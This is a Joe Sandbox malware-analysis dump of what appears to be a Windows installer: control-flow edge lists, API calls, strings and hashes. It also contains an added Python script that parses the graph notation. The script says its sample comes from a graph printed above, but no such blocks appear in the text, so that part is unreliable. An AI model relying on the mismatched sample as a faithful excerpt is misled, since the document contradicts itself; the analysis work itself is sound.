calls 56000->56185 56006 446ff8 32 API calls 56003->56006 56010 491d0e 56004->56010 56011 491cf5 56004->56011 56005 491c9d 56186 44734c 19 API calls 56005->56186 56008 491cca 56006->56008 56187 406c34 18 API calls 
56008->56187 56017 491d1d 56010->56017 56018 491d42 56010->56018 56189 407280 19 API calls 56011->56189 56012 491cd5 56188 44734c 19 API calls 56012->56188 56015 491cfd 56190 44734c 19 API calls 56015->56190 56019 446ff8 32 API calls 56017->56019 56022 491d7a 56018->56022 56023 491d51 56018->56023 56020 491d2a 56019->56020 56021 4072a8 SetCurrentDirectoryA 56020->56021 56024 491d32 56021->56024 56028 491d89 56022->56028 56029 491db2 56022->56029 56025 446ff8 32 API calls 56023->56025 56191 4470d0 19 API calls 56024->56191 56027 491d5e 56025->56027 56030 42c804 19 API calls 56027->56030 56031 446ff8 32 API calls 56028->56031 56036 491dfe 56029->56036 56037 491dc1 56029->56037 56032 491d69 56030->56032 56033 491d96 56031->56033 56192 44734c 19 API calls 56032->56192 56193 4071f8 22 API calls 56033->56193 56043 491e0d 56036->56043 56044 491e36 56036->56044 56039 446ff8 32 API calls 56037->56039 56038 491da1 56194 44734c 19 API calls 56038->56194 56041 491dd0 56039->56041 56042 446ff8 32 API calls 56041->56042 56045 491de1 56042->56045 56046 446ff8 32 API calls 56043->56046 56050 491e6e 56044->56050 56051 491e45 56044->56051 56195 4918fc 22 API calls 56045->56195 56048 491e1a 56046->56048 56052 42c8a4 19 API calls 56048->56052 56049 491ded 56196 44734c 19 API calls 56049->56196 56059 491e7d 56050->56059 56060 491ea6 56050->56060 56054 446ff8 32 API calls 56051->56054 56055 491e25 56052->56055 56056 491e52 56054->56056 56197 44734c 19 API calls 56055->56197 56058 42c8cc 19 API calls 56056->56058 56061 491e5d 56058->56061 56062 446ff8 32 API calls 56059->56062 56066 491ede 56060->56066 56067 491eb5 56060->56067 56198 44734c 19 API calls 56061->56198 56064 491e8a 56062->56064 56199 42c8fc 19 API calls 56064->56199 56072 491eed 56066->56072 56073 491f16 56066->56073 56069 446ff8 32 API calls 56067->56069 56068 491e95 56200 44734c 19 API calls 56068->56200 56071 491ec2 56069->56071 56074 42c92c 19 API calls 56071->56074 56075 446ff8 32 API calls 56072->56075 56080 491f62 
56073->56080 56081 491f25 56073->56081 56076 491ecd 56074->56076 56077 491efa 56075->56077 56201 44734c 19 API calls 56076->56201 56079 42c954 19 API calls 56077->56079 56082 491f05 56079->56082 56086 491f71 56080->56086 56087 491fb4 56080->56087 56083 446ff8 32 API calls 56081->56083 56202 44734c 19 API calls 56082->56202 56085 491f34 56083->56085 56088 446ff8 32 API calls 56085->56088 56089 446ff8 32 API calls 56086->56089 56094 491fc3 56087->56094 56095 492027 56087->56095 56090 491f45 56088->56090 56092 491f84 56089->56092 56203 42c4f8 19 API calls 56090->56203 56096 446ff8 32 API calls 56092->56096 56093 491f51 56204 44734c 19 API calls 56093->56204 56098 446ff8 32 API calls 56094->56098 56102 492066 56095->56102 56103 492036 56095->56103 56099 491f95 56096->56099 56100 491fd0 56098->56100 56205 491af4 26 API calls 56099->56205 56168 42c608 21 API calls 56100->56168 56115 4920a5 56102->56115 56116 492075 56102->56116 56106 446ff8 32 API calls 56103->56106 56105 491fa3 56206 44734c 19 API calls 56105->56206 56109 492043 56106->56109 56107 491fde 56110 491fe2 56107->56110 56111 492017 56107->56111 56113 452908 5 API calls 56109->56113 56114 446ff8 32 API calls 56110->56114 56208 4470d0 19 API calls 56111->56208 56118 492050 56113->56118 56119 491ff1 56114->56119 56124 4920e4 56115->56124 56125 4920b4 56115->56125 56117 446ff8 32 API calls 56116->56117 56120 492082 56117->56120 56209 4470d0 19 API calls 56118->56209 56169 452c80 56119->56169 56123 452770 5 API calls 56120->56123 56127 49208f 56123->56127 56132 49212c 56124->56132 56133 4920f3 56124->56133 56128 446ff8 32 API calls 56125->56128 56126 492001 56207 4470d0 19 API calls 56126->56207 56210 4470d0 19 API calls 56127->56210 56131 4920c1 56128->56131 56211 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56131->56211 56140 49213b 56132->56140 56141 492174 56132->56141 56135 446ff8 32 API calls 56133->56135 56137 492102 56135->56137 56136 4920ce 
56269->56278 56279 423c9e 56269->56279 56280 4240d6 56270->56280 56281 423d3b 56270->56281 56271->56276 56277 4240ae GetFocus 56271->56277 56282 423d78 56272->56282 56283 423d69 56272->56283 56367 424194 11 API calls 56273->56367 56274->56276 56275->56276 56302 423cc0 56275->56302 56331 423f56 56275->56331 56276->56246 56277->56276 56288 4240bf 56277->56288 56372 423b84 NtdllDefWindowProc_A 56278->56372 56289 423ca7 56279->56289 56290 423e1e PostMessageA 56279->56290 56379 424850 WinHelpA PostMessageA 56280->56379 56286 4240ed 56281->56286 56281->56302 56287 4241dc 11 API calls 56282->56287 56368 423b84 NtdllDefWindowProc_A 56283->56368 56298 4240f6 56286->56298 56299 42410b 56286->56299 56287->56276 56378 41eff4 GetCurrentThreadId EnumThreadWindows 56288->56378 56295 423cb0 56289->56295 56296 423ea5 56289->56296 56373 423b84 NtdllDefWindowProc_A 56290->56373 56305 423cb9 56295->56305 56306 423dce IsIconic 56295->56306 56307 423eae 56296->56307 56308 423edf 56296->56308 56297 423e39 56297->56276 56309 4244d4 19 API calls 56298->56309 56380 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56299->56380 56300->56302 56311 423e0b 56300->56311 56364 423b84 NtdllDefWindowProc_A 56301->56364 56302->56276 56366 423b84 NtdllDefWindowProc_A 56302->56366 56304 4240c6 56304->56276 56319 4240ce SetFocus 56304->56319 56305->56302 56320 423d91 56305->56320 56313 423dea 56306->56313 56314 423dde 56306->56314 56321 423b14 5 API calls 56307->56321 56365 423b84 NtdllDefWindowProc_A 56308->56365 56309->56276 56310->56276 56328 423fd7 IsWindowEnabled 56310->56328 56317 424178 26 API calls 56311->56317 56371 423b84 NtdllDefWindowProc_A 56313->56371 56370 423bc0 29 API calls 56314->56370 56317->56276 56318 423e45 56325 423e83 56318->56325 56326 423e61 56318->56326 56319->56276 56320->56276 56369 422c4c ShowWindow PostMessageA PostQuitMessage 56320->56369 56327 423eb6 56321->56327 56324 423ee5 56330 423efd 56324->56330 56337 41eea4 2 API calls 56324->56337 56333 423a84 6 
API calls 56325->56333 56332 423b14 5 API calls 56326->56332 56335 423ec8 56327->56335 56342 41ef58 6 API calls 56327->56342 56328->56276 56329 423fe5 56328->56329 56343 423fec IsWindowVisible 56329->56343 56338 423a84 6 API calls 56330->56338 56331->56276 56339 423f78 IsWindowEnabled 56331->56339 56340 423e69 PostMessageA 56332->56340 56341 423e8b PostMessageA 56333->56341 56374 423b84 NtdllDefWindowProc_A 56335->56374 56337->56330 56338->56276 56339->56276 56344 423f86 56339->56344 56340->56276 56341->56276 56342->56335 56343->56276 56345 423ffa GetFocus 56343->56345 56375 412310 21 API calls 56344->56375 56347 4181e0 56345->56347 56348 42400f SetFocus 56347->56348 56376 415240 56348->56376 56352 423b0d 56351->56352 56353 423a94 56351->56353 56352->56246 56353->56352 56354 423a9a EnumWindows 56353->56354 56354->56352 56355 423ab6 GetWindow GetWindowLongA 56354->56355 56381 423a1c GetWindow 56354->56381 56356 423ad5 56355->56356 56356->56352 56357 423b01 SetWindowPos 56356->56357 56357->56352 56357->56356 56358->56256 56359->56256 56361 423b72 56360->56361 56362 423b7d 56360->56362 56361->56362 56363 408720 21 API calls 56361->56363 56362->56260 56362->56261 56363->56362 56364->56318 56365->56324 56366->56276 56367->56276 56368->56276 56369->56276 56370->56276 56371->56276 56372->56276 56373->56297 56374->56276 56375->56276 56377 41525b SetFocus 56376->56377 56377->56276 56378->56304 56379->56297 56380->56297 56382 423a3d GetWindowLongA 56381->56382 56383 423a49 56381->56383 56382->56383 56384 4809f7 56385 480a00 56384->56385 56386 480a2b 56384->56386 56385->56386 56387 480a1d 56385->56387 56389 480a6a 56386->56389 56758 47f4a4 18 API calls 56386->56758 56756 476c50 202 API calls 56387->56756 56390 480a8e 56389->56390 56393 480a81 56389->56393 56394 480a83 56389->56394 56396 480aca 56390->56396 56397 480aac 56390->56397 56392 480a5d 56759 47f50c 56 API calls 56392->56759 56401 47f4e8 56 API calls 56393->56401 56760 47f57c 56 API calls 56394->56760 56395 480a22 
56395->56386 56757 408be0 19 API calls 56395->56757 56763 47f33c 38 API calls 56396->56763 56402 480ac1 56397->56402 56761 47f50c 56 API calls 56397->56761 56401->56390 56762 47f33c 38 API calls 56402->56762 56406 480ac8 56407 480ada 56406->56407 56408 480ae0 56406->56408 56409 480ade 56407->56409 56412 47f4e8 56 API calls 56407->56412 56408->56409 56410 47f4e8 56 API calls 56408->56410 56510 47c66c 56409->56510 56410->56409 56412->56409 56511 42d898 GetWindowsDirectoryA 56510->56511 56512 47c690 56511->56512 56513 403450 18 API calls 56512->56513 56514 47c69d 56513->56514 56515 42d8c4 GetSystemDirectoryA 56514->56515 56516 47c6a5 56515->56516 56517 403450 18 API calls 56516->56517 56518 47c6b2 56517->56518 56519 42d8f0 6 API calls 56518->56519 56520 47c6ba 56519->56520 56521 403450 18 API calls 56520->56521 56522 47c6c7 56521->56522 56523 47c6d0 56522->56523 56524 47c6ec 56522->56524 56795 42d208 56523->56795 56526 403400 4 API calls 56524->56526 56528 47c6ea 56526->56528 56529 47c731 56528->56529 56531 42c8cc 19 API calls 56528->56531 56775 47c4f4 56529->56775 56530 403450 18 API calls 56530->56528 56533 47c70c 56531->56533 56535 403450 18 API calls 56533->56535 56537 47c719 56535->56537 56536 403450 18 API calls 56538 47c74d 56536->56538 56537->56529 56540 403450 18 API calls 56537->56540 56539 47c76b 56538->56539 56541 4035c0 18 API calls 56538->56541 56542 47c4f4 22 API calls 56539->56542 56540->56529 56541->56539 56543 47c77a 56542->56543 56544 403450 18 API calls 56543->56544 56545 47c787 56544->56545 56546 47c7af 56545->56546 56547 42c3fc 19 API calls 56545->56547 56548 47c816 56546->56548 56551 47c4f4 22 API calls 56546->56551 56549 47c79d 56547->56549 56550 47c8de 56548->56550 56555 47c836 SHGetKnownFolderPath 56548->56555 56554 4035c0 18 API calls 56549->56554 56552 47c8e7 56550->56552 56553 47c908 56550->56553 56556 47c7c7 56551->56556 56554->56546 56559 47c850 56555->56559 56560 47c88b SHGetKnownFolderPath 56555->56560 56561 403450 18 API calls 
56556->56561 56560->56550 56756->56395 56758->56392 56759->56389 56760->56390 56761->56402 56762->56406 56763->56406 56776 42de1c RegOpenKeyExA 56775->56776 56777 47c51a 56776->56777 56778 47c540 56777->56778 56779 47c51e 56777->56779 56781 403400 4 API calls 56778->56781 56780 42dd4c 20 API calls 56779->56780 56782 47c52a 56780->56782 56783 47c547 56781->56783 56784 47c535 RegCloseKey 56782->56784 56785 403400 4 API calls 56782->56785 56783->56536 56784->56783 56785->56784 56796 4038a4 18 API calls 56795->56796 56798 42d21b 56796->56798 56797 42d232 GetEnvironmentVariableA 56797->56798 56799 42d23e 56797->56799 56798->56797 56802 42d245 56798->56802 56807 42dbd0 18 API calls 56798->56807 56800 403400 4 API calls 56799->56800 56800->56802 56802->56530 56807->56798
Strings
• Dest file is protected by Windows File Protection., xrefs: 004708ED
• Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
• Same time stamp. Skipping., xrefs: 00470D55
• Existing file has a later time stamp. Skipping., xrefs: 00470DCF
• Time stamp of our file: %s, xrefs: 0047099B
• , xrefs: 00470BCF, 00470DA0, 00470E1E
• Time stamp of existing file: (failed to read), xrefs: 00470A37
• Incrementing shared file count (32-bit)., xrefs: 004715A5
• Time stamp of existing file: %s, xrefs: 00470A2B
• Same version. Skipping., xrefs: 00470CE5
• Failed to strip read-only attribute., xrefs: 00470ED3
• Existing file is a newer version. Skipping., xrefs: 00470C02
• Stripped read-only attribute., xrefs: 00470EC7
• Version of existing file: (none), xrefs: 00470CFA
• "A4, xrefs: 00470746
• Version of our file: (none), xrefs: 00470AFC
• Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
• Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
• Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
• Will register the file (a type library) later., xrefs: 00471513
• .tmp, xrefs: 00470FB7
• Non-default bitness: 32-bit, xrefs: 004708BB
• Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
• Installing the file., xrefs: 00470F09
• InUn, xrefs: 0047115F
• Uninstaller requires administrator: %s, xrefs: 0047118F
• Will register the file (a DLL/OCX) later., xrefs: 0047151F
• @, xrefs: 004707B0
• Non-default bitness: 64-bit, xrefs: 004708AF
• Time stamp of our file: (failed to read), xrefs: 004709A7
• User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
• Dest filename: %s, xrefs: 00470894
• Incrementing shared file count (64-bit)., xrefs: 0047158C
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
• -- File entry --, xrefs: 004706FB
• Dest file exists., xrefs: 004709BB
• Couldn't read time stamp. Skipping., xrefs: 00470D35
• Installing into GAC, xrefs: 00471714
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID: $"A4$-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
• API String ID: 0-3008699294
• Opcode ID: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
• Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
• Opcode Fuzzy Hash: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
• Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph (edge list omitted). Function 42e09c-42e28f, executed path: AllocateAndInitializeSid (42e0b8) -> GetVersion (42e0e3) -> GetModuleHandleA/GetProcAddress (42e102) -> if the lookup succeeds, CheckTokenMembership (42e11d); otherwise GetCurrentThread/OpenThreadToken (42e142), falling back to GetCurrentProcess/OpenProcessToken (42e174) when GetLastError (42e15e) indicates no thread token, then GetTokenInformation twice (42e193 size query, 42e1d6 fill after call 402648), an EqualSid loop over the returned groups (42e215-42e241), CloseHandle after call 402660 (42e243) and FreeSid (42e269). Error exits go through call 4031bc to 42e287.
APIs
• AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
• GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
• FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 2252812187-1888249752
• Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
• Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
• Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
• Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
APIs
• GetVersion.KERNEL32(00480B52), ref: 004502D3
• LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
• GetProcAddress.KERNEL32(6C630000,RmStartSession), ref: 00450309
• GetProcAddress.KERNEL32(6C630000,RmRegisterResources), ref: 0045031E
• GetProcAddress.KERNEL32(6C630000,RmGetList), ref: 00450333
• GetProcAddress.KERNEL32(6C630000,RmShutdown), ref: 00450348
• GetProcAddress.KERNEL32(6C630000,RmRestart), ref: 0045035D
• GetProcAddress.KERNEL32(6C630000,RmEndSession), ref: 00450372
Strings
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
• API String ID: 1968650500-3419246398
• Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
• Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
• Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
• Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a28984740dc304245bcd2a14d03171be1c7e595ca527b28cdbc91bc5dc42f766
• Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
• Opcode Fuzzy Hash: a28984740dc304245bcd2a14d03171be1c7e595ca527b28cdbc91bc5dc42f766
• Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
APIs
  • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
• LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
  • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
  • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
  • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
  • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
  • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
  • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
  • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
  • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
• GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,020C0BB0,020C2910,?,?,020C2940,?,?,020C2990,?), ref: 004683FD
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
  • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
• String ID: $(Default)$STOPIMAGE$%H
• API String ID: 3231140908-2624782221
• Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
• Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
• Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
• Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
Uniqueness

Uniqueness Score: -1.00%
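
The control_flow_graph record at the top of this function entry is the IDA plugin's flattened edge list: each basic block appears as `<id> <start>[-<end>]` followed by its `call <addr>` sub-calls and any imported API it calls by name, and `<a>-><b>` tokens are the edges between block ids. The following Python is an added example, not code from the Joe Sandbox report or its plugin: it parses that notation, lists the blocks that call an imported API directly, counts how often each internal sub-function is called, and finds the shortest block path from the function entry to an API-calling block, which is the question an analyst usually has when deciding whether a LoadBitmapA or GetSystemMenu call is reachable on the main path. The embedded sample is an excerpt of the graph printed above (function 0x4673a4, blocks 2133 to 2189); most of block 2189's sub-calls and every block after it are omitted to keep it short. Reading `* N` as "the preceding callee repeated N times" is an assumption about the plugin's notation.

```python
"""Parse Joe Sandbox's flattened 'control_flow_graph' notation and locate the
basic blocks that call Windows APIs. Added example, not part of the report."""
import re
from collections import Counter, deque

# Constructed excerpt of the graph printed on this page (function at 0x4673a4).
# Blocks after 2189 and most of block 2189's sub-calls are omitted.
SAMPLE_CFG = (
    "2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 "
    "2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 "
    "2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 "
    "2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc "
    "2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 "
    "2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 "
    "2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 "
    "2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 "
    "2160->2169 2166->2160 2167->2166 "
    "2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 "
    "2181 46759a-4675af call 451458 call 414b18 2174->2181 "
    "2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 "
    "2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 "
    "LoadBitmapA call 41d6b0 2188->2189"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")      # hex address or range
API_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")         # bare import name


def parse_cfg(text):
    """Return (blocks, edges). blocks is an insertion-ordered dict
    id -> {'range': str, 'calls': [callee, ...]} where a callee is either a
    hex address (internal sub-call) or an API name. edges is a list of (a, b)."""
    toks = text.split()
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:                                           # '<a>-><b>'
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t == "call":                               # 'call <addr>'
            blocks[cur]["calls"].append(toks[i + 1])
            i += 2
        elif t == "*":                                  # '* N': assumed to repeat the previous callee
            calls = blocks[cur]["calls"]
            calls.extend([calls[-1]] * (int(toks[i + 1]) - 1))
            i += 2
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = int(t)                                # '<id> <start>[-<end>]' opens a block
            blocks[cur] = {"range": toks[i + 1], "calls": []}
            i += 2
        elif API_RE.match(t):                           # imported API called from this block
            blocks[cur]["calls"].append(t)
            i += 1
        else:
            raise ValueError("unexpected token %r at index %d" % (t, i))
    return blocks, edges


def api_blocks(blocks):
    """Map block id -> list of imported APIs it calls directly."""
    out = {}
    for bid, b in blocks.items():
        apis = [c for c in b["calls"] if not ADDR_RE.match(c)]
        if apis:
            out[bid] = apis
    return out


def callee_histogram(blocks):
    """How often each internal sub-function is called across the function."""
    return Counter(c for b in blocks.values() for c in b["calls"] if ADDR_RE.match(c))


def shortest_path(edges, src, dst):
    """BFS over the edge list; returns the block-id path src..dst, or None."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    parent, q = {src: None}, deque([src])
    while q:
        n = q.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for m in succ.get(n, []):
            if m not in parent:
                parent[m] = n
                q.append(m)
    return None


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    entry = next(iter(blocks))                          # first block listed is the entry
    for bid, apis in api_blocks(blocks).items():
        print("block %d (%s) calls %s" % (bid, blocks[bid]["range"], ", ".join(apis)))
        print("  path from entry:", " -> ".join(map(str, shortest_path(edges, entry, bid))))
    print("most-called helpers:", callee_histogram(blocks).most_common(3))
```

On the excerpt this reports LoadBitmapA in block 2189 and the eight-edge path 2133 -> 2134 -> 2153 -> 2160 -> 2168 -> 2174 -> 2181 -> 2188 -> 2189; running it on the full record simply means pasting the whole control_flow_graph text into SAMPLE_CFG.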

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
